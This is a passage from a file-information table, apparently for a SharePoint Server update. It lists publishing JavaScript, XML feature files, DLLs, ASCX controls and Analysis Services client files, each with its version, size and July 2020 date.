\nastpkrs_js| assetpickers.js| | 68294| 7-Jul-20| 11:27 \nsm.js| cmssitemanager.js| | 29281| 7-Jul-20| 11:27 \ncmssummarylinks_js| cmssummarylinks.js| | 6017| 7-Jul-20| 11:27 \neditmenu_js| editingmenu.js| | 11361| 7-Jul-20| 11:27 \nhierlist_js| hierarchicallistbox.js| | 30329| 7-Jul-20| 11:27 \nmediaplayer.js| mediaplayer.js| | 47727| 7-Jul-20| 11:27 \nptdlg.js| pickertreedialog.js| | 2952| 7-Jul-20| 11:27 \nselect_js| select.js| | 2389| 7-Jul-20| 11:27 \nslctctls_js| selectorcontrols.js| | 13290| 7-Jul-20| 11:27 \nserializ_js| serialize.js| | 3221| 7-Jul-20| 11:27 \nsp.ui.assetlibrary.ribbon.debug.js| sp.ui.assetlibrary.debug.js| | 13367| 7-Jul-20| 11:27 \nsp.ui.assetlibrary.js| sp.ui.assetlibrary.js| | 5457| 7-Jul-20| 11:27 \nsp.ui.pub.htmldesign.debug.js| sp.ui.pub.htmldesign.debug.js| | 38342| 7-Jul-20| 11:27 \nsp.ui.pub.htmldesign.js| sp.ui.pub.htmldesign.js| | 19409| 7-Jul-20| 11:27 \nsp.ui.pub.ribbon.debug.js| sp.ui.pub.ribbon.debug.js| | 146313| 7-Jul-20| 11:27 \nsp.ui.pub.ribbon.js| sp.ui.pub.ribbon.js| | 84981| 7-Jul-20| 11:27 \nsp.ui.rte.publishing.debug.js| sp.ui.rte.publishing.debug.js| | 98216| 7-Jul-20| 11:27 \nsp.ui.rte.publishing.js| sp.ui.rte.publishing.js| | 49718| 7-Jul-20| 11:27 \nsp.ui.spellcheck.debug.js| sp.ui.spellcheck.debug.js| | 68393| 7-Jul-20| 11:27 \nsp.ui.spellcheck.js| sp.ui.spellcheck.js| | 36524| 7-Jul-20| 11:27 \nsplchkpg_js| spellcheckentirepage.js| | 6655| 7-Jul-20| 11:27 \nspelchek_js| spellchecker.js| | 34659| 7-Jul-20| 11:27 \nvideoportal.js| videoportal.js| | 14744| 7-Jul-20| 11:27 \nmicrosoft.sharepoint.publishing.dll_isapi| microsoft.sharepoint.publishing.dll| 16.0.10363.12107| 5408696| 7-Jul-20| 11:28 \nsharepointpub.dll| microsoft.sharepoint.publishing.dll| 16.0.10363.12107| 5408696| 7-Jul-20| 11:28 \nsharepointpub_gac.dll| microsoft.sharepoint.publishing.dll| 16.0.10363.12107| 5408696| 7-Jul-20| 11:28 \nsppubint.dll| microsoft.sharepoint.publishing.intl.dll| 16.0.10363.12107| 350632| 7-Jul-20| 11:28 \nsppubint_gac.dll| microsoft.sharepoint.publishing.intl.dll| 16.0.10363.12107| 350632| 7-Jul-20| 11:28 \nschema.xml_pubresfeap| schema.xml| | 44173| 5-Jul-20| 09:41 \nasctyps.xml| assetcontenttypes.xml| | 2846| 5-Jul-20| 09:40 \nasctyps2.xml| assetcontenttypes2.xml| | 2460| 5-Jul-20| 09:40 \nasflds.xml| assetfields.xml| | 1366| 5-Jul-20| 09:41 \nasflds2.xml| assetfields2.xml| | 1045| 5-Jul-20| 09:40 \naslibalt.xml| assetlibrarytemplate.xml| | 555| 5-Jul-20| 09:40 \naslibft.xml| feature.xml| | 2763| 5-Jul-20| 09:41 \naslibui.xml| provisionedui.xml| | 5075| 5-Jul-20| 09:40 \naslibui2.xml| provisionedui2.xml| | 1708| 5-Jul-20| 09:40 \ncdsele.xml| contentdeploymentsource.xml| | 637| 5-Jul-20| 09:37 \ncdsfeatu.xml| feature.xml| | 604| 5-Jul-20| 09:36 \ndocmpgcv.xml| docmpageconverter.xml| | 496| 5-Jul-20| 09:38 \ndocxpgcv.xml| docxpageconverter.xml| | 496| 5-Jul-20| 09:37 \nconvfeat.xml| feature.xml| | 766| 5-Jul-20| 09:38 \nippagecv.xml| infopathpageconverter.xml| | 577| 5-Jul-20| 09:37 \nxslappcv.xml| xslapplicatorconverter.xml| | 575| 5-Jul-20| 09:38 \nanalyticsreports.xml| analyticsreports.xml| | 2850| 5-Jul-20| 09:25 \nxspsset.xml| catalogsitesettings.xml| | 556| 5-Jul-20| 09:22 \nxspfeat.xml| feature.xml| | 1514| 5-Jul-20| 09:23 \ndepoper.xml| deploymentoperations.xml| | 2415| 5-Jul-20| 09:24 \ndepfeat.xml| feature.xml| | 788| 5-Jul-20| 09:25 \npestset.xml| enhancedhtmlediting.xml| | 157| 5-Jul-20| 09:37 \npefeat.xml| feature.xml| | 793| 5-Jul-20| 09:38 \nenthmft.xml| feature.xml| | 564| 5-Jul-20| 09:42 \nenthmset.xml| themingsitesettings.xml| | 1005| 5-Jul-20| 09:42 \nenctb.xml| enterprisewikicontenttypebinding.xml| | 559| 5-Jul-20| 09:25 \nenctb2.xml| enterprisewikicontenttypebinding2.xml| | 390| 5-Jul-20| 09:24 \nenfet.xml| feature.xml| | 1168| 5-Jul-20| 09:23 \nenct.xml| enterprisewikicontenttypes.xml| | 1456| 5-Jul-20| 09:39 \nenct2.xml| enterprisewikicontenttypes2.xml| | 1211| 5-Jul-20| 09:39 \nenlayfet.xml| feature.xml| | 1618| 5-Jul-20| 09:39 \nprov.xml| provisionedfiles.xml| | 1181| 5-Jul-20| 09:39 \nprov2.xml| provisionedfiles2.xml| | 1197| 5-Jul-20| 09:39 \newiki2.xml| feature.xml| | 766| 5-Jul-20| 09:24 \nhtmlfeat.xml| feature.xml| | 11263| 5-Jul-20| 09:23 \nhtmlcolm.xml| htmldesigncolumns.xml| | 909| 5-Jul-20| 09:24 \nhtmlcol2.xml| htmldesigncolumns2.xml| | 543| 5-Jul-20| 09:22 \nhtmlcol3.xml| htmldesigncolumns3.xml| | 597| 5-Jul-20| 09:24 \nhtmlcont.xml| htmldesigncontenttypes.xml| | 2330| 5-Jul-20| 09:24 \nhtmlfile.xml| htmldesignfiles.xml| | 657| 5-Jul-20| 09:23 \nhtmlfil2.xml| htmldesignfiles2.xml| | 771| 5-Jul-20| 09:22 \nhtmlfil3.xml| htmldesignfiles3.xml| | 895| 5-Jul-20| 09:25 \nhtmldpui.xml| htmldesignprovisionedui.xml| | 669| 5-Jul-20| 09:22 \nhtmldrib.xml| htmldesignribbon.xml| | 29320| 5-Jul-20| 09:25 \nhtmldpct.xml| htmldisplaytemplatecontenttypes.xml| | 11361| 5-Jul-20| 09:25 \nhtmldpwp.xml| htmldisplaytemplatefiles.xml| | 9302| 5-Jul-20| 09:23 \nhtmldpwp10.xml| htmldisplaytemplatefiles10.xml| | 575| 5-Jul-20| 09:23 \nhtmldpwp11.xml| htmldisplaytemplatefiles11.xml| | 1091| 5-Jul-20| 09:24 \nhtmldpwp12.xml| htmldisplaytemplatefiles12.xml| | 401| 5-Jul-20| 09:22 \nhtmldpwp13.xml| htmldisplaytemplatefiles13.xml| | 396| 5-Jul-20| 09:23 \nhtmldpwp14.xml| htmldisplaytemplatefiles14.xml| | 856| 5-Jul-20| 09:24 \nhtmldpwp15.xml| htmldisplaytemplatefiles15.xml| | 492| 5-Jul-20| 09:25 \nhtmldpwp2.xml| htmldisplaytemplatefiles2.xml| | 830| 5-Jul-20| 09:24 \nhtmldpwp3.xml| htmldisplaytemplatefiles3.xml| | 497| 5-Jul-20| 09:22 \nhtmldpwp4.xml| htmldisplaytemplatefiles4.xml| | 496| 5-Jul-20| 09:22 \nhtmldpwp5.xml| htmldisplaytemplatefiles5.xml| | 506| 5-Jul-20| 09:25 \nhtmldpwp6.xml| htmldisplaytemplatefiles6.xml| | 412| 5-Jul-20| 09:25 \nhtmldpwp7.xml| htmldisplaytemplatefiles7.xml| | 4003| 5-Jul-20| 09:23 \nhtmldpwp8.xml| htmldisplaytemplatefiles8.xml| | 399| 5-Jul-20| 09:23 \nhtmldpwp9.xml| htmldisplaytemplatefiles9.xml| | 401| 5-Jul-20| 09:24 \nhtmldtcbs.xml| htmldisplaytemplatefilesoobcbs.xml| | 580| 5-Jul-20| 09:22 \nhtmldtqb.xml| htmldisplaytemplatefilesqb.xml| | 598| 5-Jul-20| 09:24 \nhtmldtqbref.xml| htmldisplaytemplatefilesqbref.xml| | 507| 5-Jul-20| 09:23 \nhtmldpwp_recs.xml| htmldisplaytemplatefilesrecs.xml| | 418| 5-Jul-20| 09:25 \nststngimplk.xml| sitesettingsimportlink.xml| | 667| 5-Jul-20| 09:22 \naltmp.xam| alternatemediaplayer.xaml| | 35634| 5-Jul-20| 09:34 \nmwpfeat.xml| feature.xml| | 940| 5-Jul-20| 09:34 \nmwpprovf.xml| provisionedfiles.xml| | 1457| 5-Jul-20| 09:34 \nmwpprovu.xml| provisionedui.xml| | 22914| 5-Jul-20| 09:35 \nmwpprovui2.xml| provisionedui2.xml| | 2690| 5-Jul-20| 09:35 \npnfeat.xml| feature.xml| | 782| 5-Jul-20| 09:25 \npnstset.xml| navigationsitesettings.xml| | 4721| 5-Jul-20| 09:23 \nplnfeat.xml| feature.xml| | 760| 5-Jul-20| 09:25 \nplnstset.xml| navigationsitesettings.xml| | 152| 5-Jul-20| 09:25 \ntpfeat.xml| feature.xml| | 2846| 5-Jul-20| 09:38 \ntpcls.xml| pointpublishingcolumns.xml| | 701| 5-Jul-20| 09:38 \ntpcts.xml| pointpublishingcontenttypes.xml| | 488| 5-Jul-20| 09:38 \ntptltsch.xml| schema.xml| | 4088| 5-Jul-20| 09:41 \npclts.xml| schema.xml| | 2354| 5-Jul-20| 09:40 \npcltf.xml| feature.xml| | 857| 5-Jul-20| 09:41 \npclt.xml| productcataloglisttemplate.xml| | 753| 5-Jul-20| 09:41 \npcfeat.xml| feature.xml| | 1699| 5-Jul-20| 09:40 \npccol.xml| productcatalogcolumns.xml| | 6259| 5-Jul-20| 09:39 \npcct.xml| productcatalogcontenttypes.xml| | 830| 5-Jul-20| 09:39 \npcct2.xml| productcatalogcontenttypes2.xml| | 643| 5-Jul-20| 09:39 \npcprov.xml| provisionedfiles.xml| | 926| 5-Jul-20| 09:39 \npubpubpf.xml| feature.xml| | 551| 5-Jul-20| 09:35 \npppptset.xml| portalsettings.xml| | 584| 5-Jul-20| 09:34 \nctconvst.xml| contenttypeconvertersettings.xml| | 511| 5-Jul-20| 09:23 \ndoclbset.xml| documentlibrarysettings.xml| | 524| 5-Jul-20| 09:24 \neditmenu.xml| editingmenu.xml| | 470| 5-Jul-20| 09:23 \npubfeat.xml| feature.xml| | 2696| 5-Jul-20| 09:25 \npaglttmp.xml| pageslisttemplate.xml| | 516| 5-Jul-20| 09:25 \nprovui.xml| provisionedui.xml| | 40574| 5-Jul-20| 09:24 \nprovui2.xml| provisionedui2.xml| | 1489| 5-Jul-20| 09:25 \nprovui3.xml| provisionedui3.xml| | 2135| 5-Jul-20| 09:22 \npubstset.xml| publishingsitesettings.xml| | 6235| 5-Jul-20| 09:24 \nregext.xml| regionalsettingsextensions.xml| | 328| 5-Jul-20| 09:22 \nsiteacmn.xml| siteactionmenucustomization.xml| | 646| 5-Jul-20| 09:23 \nvarflagc.xml| variationsflagcontrol.xml| | 473| 5-Jul-20| 09:24 \nvarnomin.xml| variationsnomination.xml| | 613| 5-Jul-20| 09:23 \npblyfeat.xml| feature.xml| | 6194| 5-Jul-20| 09:34 \npblyprovfile.xml| provisionedfiles.xml| | 7964| 5-Jul-20| 09:35 \npblyprovfile2.xml| provisionedfiles2.xml| | 610| 5-Jul-20| 09:35 \npblyprovfile4.xml| provisionedfiles4.xml| | 308| 5-Jul-20| 09:35 \npblyprovfile5.xml| provisionedfiles5.xml| | 414| 5-Jul-20| 09:34 \npblyprovfile6.xml| provisionedfiles6.xml| | 385| 5-Jul-20| 09:35 \npblyprovfile7.xml| provisionedfiles7.xml| | 1170| 5-Jul-20| 09:35 \npblyprovfile8.xml| provisionedfiles8.xml| | 507| 5-Jul-20| 09:34 \npblyprovui.xml| provisionedui.xml| | 11330| 5-Jul-20| 09:34 \nxspfeatlayouts.xml| searchboundpagelayouts.xml| | 3671| 5-Jul-20| 09:35 \npubmelem.xml| elements.xml| | 4149| 5-Jul-20| 09:35 \npubmele2.xml| elements2.xml| | 592| 5-Jul-20| 09:35 \npubmfeat.xml| feature.xml| | 1697| 5-Jul-20| 09:34 \npubmprui.xml| provisionedui.xml| | 1548| 5-Jul-20| 09:35 \npubmstng.xml| sitesettings.xml| | 670| 5-Jul-20| 09:35 \npubprft.xml| feature.xml| | 758| 5-Jul-20| 09:36 \npubrfeat.xml| feature.xml| | 4927| 5-Jul-20| 09:37 \nprovfile.xml| provisionedfiles.xml| | 4739| 5-Jul-20| 09:37 \nprovfl4.xml| provisionedfiles4.xml| | 1394| 5-Jul-20| 09:37 \npubrcol.xml| publishingcolumns.xml| | 20566| 5-Jul-20| 09:38 \npubrctt.xml| publishingcontenttypes.xml| | 12093| 5-Jul-20| 09:37 \npubrctt2.xml| publishingcontenttypes2.xml| | 304| 5-Jul-20| 09:38 \npubrctt3.xml| publishingcontenttypes3.xml| | 500| 5-Jul-20| 09:37 \npubrcont.xml| publishingcontrols.xml| | 405| 5-Jul-20| 09:38 \nprsset.xml| publishingresourcessitesettings.xml| | 3506| 5-Jul-20| 09:37 \nupgd1.xml| upgrade1.xml| | 548| 5-Jul-20| 09:37 \nupgd2.xml| upgrade2.xml| | 486| 5-Jul-20| 09:37 \nupgd3.xml| upgrade3.xml| | 600| 5-Jul-20| 09:37 \npubtfeat.xml| feature.xml| | 1477| 5-Jul-20| 09:35 \nrollplf.xml| feature.xml| | 862| 5-Jul-20| 09:36 \nrollplpf.xml| provisionedfiles.xml| | 14529| 5-Jul-20| 09:37 \nrollplct.xml| rolluppagecontenttype.xml| | 742| 5-Jul-20| 09:35 \nrollpf.xml| feature.xml| | 816| 5-Jul-20| 09:41 \nrollps.xml| rolluppagesettings.xml| | 4091| 5-Jul-20| 09:42 \nseofeatu.xml| feature.xml| | 1253| 5-Jul-20| 09:25 \nseoopt.xml| searchengineoptimization.xml| | 3578| 5-Jul-20| 09:22 \nseoopt1.xml| searchengineoptimization1.xml| | 2904| 5-Jul-20| 09:23 \nsppelm.xml| elements.xml| | 1843| 5-Jul-20| 09:24 \nsppfea.xml| feature.xml| | 1015| 5-Jul-20| 09:22 \nsaicona.xml| consoleaction.xml| | 412| 5-Jul-20| 09:34 \nsaifeat.xml| feature.xml| | 1324| 5-Jul-20| 09:35 \nsairibn.xml| ribbon.xml| | 2895| 5-Jul-20| 09:34 \nsaisset.xml| sitesettings.xml| | 584| 5-Jul-20| 09:35 \naddtheme.xml| additionalthemes.xml| | 3819| 5-Jul-20| 09:39 \nsbwcopa.xml| colorpalette.xml| | 4813| 5-Jul-20| 09:39 \nsbwcona.xml| consoleaction.xml| | 692| 5-Jul-20| 09:40 \nsbwct.xml| contenttypes.xml| | 4261| 5-Jul-20| 09:39 \nsbwdesba.xml| designbuilderaction.xml| | 444| 5-Jul-20| 09:39 \nsbwdesea.xml| designeditoraction.xml| | 438| 5-Jul-20| 09:39 \nsbwdpa.xml| designpackageactions.xml| | 418| 5-Jul-20| 09:39 \nsbwdpr.xml| designpreviewaction.xml| | 447| 5-Jul-20| 09:40 \nsbwdmt.xml| disablesystemmasterpagetheming.xml| | 436| 5-Jul-20| 09:39 \nsbwfeat.xml| feature.xml| | 6499| 5-Jul-20| 09:39 \nsbwinsdes.xml| installeddesigns.xml| | 536| 5-Jul-20| 09:39 \nsbwmob.xml| mobilechannel.xml| | 1098| 5-Jul-20| 09:39 \nsbwpagela.xml| pagelayouts.xml| | 4119| 5-Jul-20| 09:39 \nsbwpages.xml| pages.xml| | 13120| 5-Jul-20| 09:39 \npubblogwp.xml| publishingblogwebparts.xml| | 949| 5-Jul-20| 09:40 \nsbwqd.xml| quicklaunchdatasource.xml| | 685| 5-Jul-20| 09:39 \nsbwrb.xml| ribbon.xml| | 44107| 5-Jul-20| 09:39 \nsbwsearch.xml| search.xml| | 2352| 5-Jul-20| 09:39 \nsbwsc.xml| sitecolumns.xml| | 3579| 5-Jul-20| 09:40 \nsbwsec.xml| siteelementcontrols.xml| | 952| 5-Jul-20| 09:39 \nsbwss.xml| sitesettings.xml| | 14657| 5-Jul-20| 09:39 \nsbwcss.xml| styles.xml| | 625| 5-Jul-20| 09:39 \nsbwwps.xml| webparts.xml| | 509| 5-Jul-20| 09:39 \nsbwfsf.xml| feature.xml| | 708| 5-Jul-20| 09:39 \nscfeatr.xml| feature.xml| | 856| 5-Jul-20| 09:40 \nspelchek.xml| spellchecking.xml| | 1033| 5-Jul-20| 09:41 \nspelchk2.xml| spellchecking2.xml| | 2641| 5-Jul-20| 09:40 \ncms_tenantadmindeploymentlinksfeature_feature_xml| feature.xml| | 826| 5-Jul-20| 09:22 \ncms_tenantadmindeploymentlinksfeature_links_xml| links.xml| | 542| 5-Jul-20| 09:23 \ntopicplf.xml| feature.xml| | 732| 5-Jul-20| 09:41 \ntopicpf.xml| feature.xml| | 713| 5-Jul-20| 09:39 \nplnkfeat.xml| feature.xml| | 621| 5-Jul-20| 09:22 \npublcol.xml| publishedlinkscolumns.xml| | 1206| 5-Jul-20| 09:24 \npublctt.xml| publishedlinkscontenttypes.xml| | 948| 5-Jul-20| 09:23 \nv2vpblyfeat.xml| feature.xml| | 540| 5-Jul-20| 09:22 \nv2vpblyprovfil.xml| provisionedfiles.xml| | 1934| 5-Jul-20| 09:24 \nvwfrmlk.xml| feature.xml| | 794| 5-Jul-20| 09:23 \nxmlsfeat.xml| feature.xml| | 818| 5-Jul-20| 09:43 \nxmlsitem.xml| xmlsitemap.xml| | 624| 5-Jul-20| 09:43 \nmicrosoft.cobaltcore.dll| microsoft.cobaltcore.dll| 16.0.10363.12107| 3081648| 7-Jul-20| 11:23 \nmicrosoft.cobalt.base.dll| microsoft.cobalt.base.dll| 16.0.10363.12107| 874928| 7-Jul-20| 11:28 \nsystem.collections.immutable.dll| system.collections.immutable.dll| 4.6.23123.00| 193456| | \nupdate_system.collections.immutable.dll| system.collections.immutable.dll| 4.6.23123.00| 193456| 5-Jul-20| 09:39 \ncsisrv.dll| csisrv.dll| 16.0.10363.12107| 1283496| 7-Jul-20| 11:28 \ncsisrvexe.exe| csisrvexe.exe| 16.0.10363.12107| 328632| 7-Jul-20| 11:28 \nonfda.dll| onfda.dll| 16.0.10363.12107| 2096560| 7-Jul-20| 11:28 \ncolumnfiltering.ascx| columnfiltering.ascx| | 443| 7-Jul-20| 01:30 \ndocsettemplates.ascx| docsettemplates.ascx| | 1459| 7-Jul-20| 01:30 \nmetadatanavkeyfilters.ascx| metadatanavkeyfilters.ascx| | 4647| 7-Jul-20| 01:30 \nmetadatanavtree.ascx| metadatanavtree.ascx| | 2686| 7-Jul-20| 01:30 \nmultilangtemplates.ascx| transmgmtlibtemplates.ascx| | 3287| 7-Jul-20| 01:30 \nvideosettemplates.ascx| videosettemplates.ascx| | 1972| 7-Jul-20| 01:30 \neditdlg.htm_multilang| editdlg.htm| | 4796| 7-Jul-20| 01:30 \nfiledlg.htm_multilang| filedlg.htm| | 3344| 7-Jul-20| 01:30 \nediscoveryquerystatistics.ascx| ediscoveryquerystatistics.ascx| | 1357| 7-Jul-20| 01:30 \nediscoverytemplate.ascx| ediscoverytemplate.ascx| | 3267| 7-Jul-20| 01:30 \npdfirml.dll_0002| microsoft.office.irm.pdfprotectorlib.dll| 16.0.10363.12107| 1308552| 7-Jul-20| 01:30 \nbarcodeglobalsettings.ascx| barcodeglobalsettings.ascx| | 1473| 7-Jul-20| 01:30 \nbargensettings.ascx| bargensettings.ascx| | 1523| 7-Jul-20| 01:30 \ndropoffzoneroutingform.ascx| dropoffzoneroutingform.ascx| | 3528| 7-Jul-20| 01:30 \nrecordsribbon.ascx| recordsribbon.ascx| | 367| 7-Jul-20| 01:30 \nmicrosoft.office.policy.dll| microsoft.office.policy.dll| 16.0.10363.12107| 2383240| 7-Jul-20| 01:30 \nmicrosoft.office.policy.dll_isapi| microsoft.office.policy.dll| 16.0.10363.12107| 2383240| 7-Jul-20| 01:30 \nmicrosoft.office.policy.pages.dll| microsoft.office.policy.pages.dll| 16.0.10363.12107| 540040| 7-Jul-20| 01:30 \nauditcustquery.ascx| auditcustomquery.ascx| | 11154| 7-Jul-20| 01:30 \nauditsettings.ascx| auditsettings.ascx| | 3594| 7-Jul-20| 01:30 \nbarcodesettings.ascx| barcodesettings.ascx| | 1399| 7-Jul-20| 01:30 \ndiscoveryglobalcontrol.ascx| discoveryglobalcontrol.ascx| | 5175| 7-Jul-20| 01:30 \ndiscoveryproperties.ascx| discoveryproperties.ascx| | 7132| 7-Jul-20| 01:30 \ndiscoveryquerystatistics.ascx| discoveryquerystatistics.ascx| | 3788| 7-Jul-20| 01:30 \ndlptemplatepicker.ascx| dlptemplatepicker.ascx| | 3594| 7-Jul-20| 01:30 \nlabelsettings.ascx| labelsettings.ascx| | 9510| 7-Jul-20| 01:30 \nretentionsettings.ascx| retentionsettings.ascx| | 11060| 7-Jul-20| 01:30 \ndw20.exe_0001| dw20.exe| 16.0.10363.12107| 2129328| 7-Jul-20| 11:22 \ndwtrig20.exe| dwtrig20.exe| 16.0.10363.12107| 318944| 7-Jul-20| 11:22 \nconversion.office.gfxserver.dll| gfxserver.dll| 16.0.10363.12107| 5274528| 7-Jul-20| 11:22 \nppt.conversion.gfxserver.dll| gfxserver.dll| 16.0.10363.12107| 5274528| | \nppt.edit.gfxserver.dll| gfxserver.dll| 16.0.10363.12107| 5274528| | \nwac.office.gfxserver.dll| gfxserver.dll| 16.0.10363.12107| 5274528| | \nconversion.igxserver.dll| igxserver.dll| 16.0.10363.12107| 12129168| 7-Jul-20| 11:25 \nppt.conversion.igxserver.dll| igxserver.dll| 16.0.10363.12107| 12129168| | \nppt.edit.igxserver.dll| igxserver.dll| 16.0.10363.12107| 12129168| | \nwac.office.igxserver.dll| igxserver.dll| 16.0.10363.12107| 12129168| | \nsltemp.asc| sldlibtemplates.ascx| | 12554| 5-Jul-20| 09:49 \nsldlib.js| sldlib.js| | 29295| 5-Jul-20| 09:37 \neditdlg.htm_slfeat| editdlg.htm| | 4796| 5-Jul-20| 09:31 \nfiledlg.htm_slfeat| filedlg.htm| | 3344| 5-Jul-20| 09:31 \nclientx.dll| microsoft.office.sharepoint.clientextensions.dll| 16.0.10363.12107| 381904| 7-Jul-20| 11:25 \nclientxr.dll.x64| microsoft.office.sharepoint.clientextensions.dll| 16.0.10363.12107| 381904| 7-Jul-20| 11:25 \nmicrosoft.office.server.chart.dll| microsoft.office.server.chart.dll| 16.0.10363.12107| 603064| 7-Jul-20| 11:30 \nmicrosoft.office.server.chart_gac.dll| microsoft.office.server.chart.dll| 16.0.10363.12107| 603064| 7-Jul-20| 11:30 \nas_adal_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| adal.dll| | 1456656| 5-Jul-20| 09:50 \nas_adal_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| adal.dll| | 1784544| 5-Jul-20| 09:52 \nas_azureclient_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| microsoft.analysisservices.azureclient.dll| | 316496| 5-Jul-20| 09:52 \nas_azureclient_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| microsoft.analysisservices.azureclient.dll| | 316496| 5-Jul-20| 09:50 \nas_client_db2v0801_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| db2v0801.xsl| | 30717| 5-Jul-20| 09:50 \nas_client_db2v0801_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| db2v0801.xsl| | 30717| 5-Jul-20| 09:50 \nas_client_hive_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| hive.xsl| | 81782| 5-Jul-20| 09:51 \nas_client_hive_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| hive.xsl| | 81782| 5-Jul-20| 09:51 \nas_client_msql_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msql.xsl| | 128792| 5-Jul-20| 09:50 \nas_client_msql_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msql.xsl| | 128792| 5-Jul-20| 09:50 \nas_client_orcl7_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| orcl7.xsl| | 95739| 5-Jul-20| 09:50 \nas_client_orcl7_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| orcl7.xsl| | 95739| 5-Jul-20| 09:50 \nas_client_sqlpdw_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sqlpdw.xsl| | 105635| 5-Jul-20| 09:51 \nas_client_sqlpdw_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sqlpdw.xsl| | 105635| 5-Jul-20| 09:51 \nas_client_trdtv2r41_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| trdtv2r41.xsl| | 105800| 5-Jul-20| 09:50 \nas_client_trdtv2r41_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| trdtv2r41.xsl| | 105800| 5-Jul-20| 09:50 \nas_client_xmsrv_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| xmsrv.dll| | 35081808| 5-Jul-20| 09:50 \nas_client_xmsrv_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| xmsrv.dll| | 25498704| 5-Jul-20| 09:52 \nas_clientas80_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| as80.xsl| | 17484| 5-Jul-20| 09:50 \nas_clientas80_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| as80.xsl| | 17484| 5-Jul-20| 09:50 \nas_clientas90_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| as90.xsl| | 20021| 5-Jul-20| 09:50 \nas_clientas90_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| as90.xsl| | 20021| 5-Jul-20| 09:50 \nas_clientinformix_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| informix.xsl| | 32145| 5-Jul-20| 09:51 \nas_clientinformix_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| informix.xsl| | 32145| 5-Jul-20| 09:51 \nas_clientmsjet_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msjet.xsl| | 30427| 5-Jul-20| 09:51 \nas_clientmsjet_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msjet.xsl| | 30427| 5-Jul-20| 09:51 \nas_clientmsmgdsrv_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msmgdsrv.dll| | 7638824| 5-Jul-20| 09:50 \nas_clientmsmgdsrv_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msmgdsrv.dll| | 9328720| 5-Jul-20| 09:52 \nas_clientsql120_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sql120.xsl| | 135247| 5-Jul-20| 09:50 \nas_clientsql120_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sql120.xsl| | 135247| 5-Jul-20| 09:50 \nas_clientsql2000_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sql2000.xsl| | 35014| 5-Jul-20| 09:50 \nas_clientsql2000_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sql2000.xsl| | 35014| 5-Jul-20| 09:50 \nas_clientsql70_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sql70.xsl| | 33181| 5-Jul-20| 09:50 \nas_clientsql70_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sql70.xsl| | 33181| 5-Jul-20| 09:50 \nas_clientsql90_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sql90.xsl| | 136426| 5-Jul-20| 09:50 \nas_clientsql90_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sql90.xsl| | 136426| 5-Jul-20| 09:50 \nas_clientsybase_xsl_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sybase.xsl| | 30964| 5-Jul-20| 09:51 \nas_clientsybase_xsl_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sybase.xsl| | 30964| 5-Jul-20| 09:51 \nas_msmdlocal_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msmdlocal.dll| | 45813840| 5-Jul-20| 09:50 \nas_msmdlocal_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msmdlocal.dll| | 63495968| 5-Jul-20| 09:51 \nas_msolap_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msolap.dll| | 7999272| 5-Jul-20| 09:52 \nas_msolap_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msolap.dll| | 10331936| 5-Jul-20| 09:51 \nas_msolui_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msolui.dll| | 292128| 5-Jul-20| 09:51 \nas_msolui_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| msolui.dll| | 312616| 5-Jul-20| 09:50 \nas_sqldumper_exe_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sqldumper.exe| | 147560| 5-Jul-20| 09:52 \nas_sqldumper_exe_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| sqldumper.exe| | 172368| 5-Jul-20| 09:51 \nas_xmlrw_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| xmlrw.dll| | 289376| 5-Jul-20| 09:52 \nas_xmlrw_dll_64.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| xmlrw.dll| | 333928| 5-Jul-20| 09:50 \nas_xmlrwbin_dll_32.b77a7d1e_2d54_42cb_81a8_c5262ccc792b| xmlrwbin.dll| | 194152| 5-Jul-20| 09:50 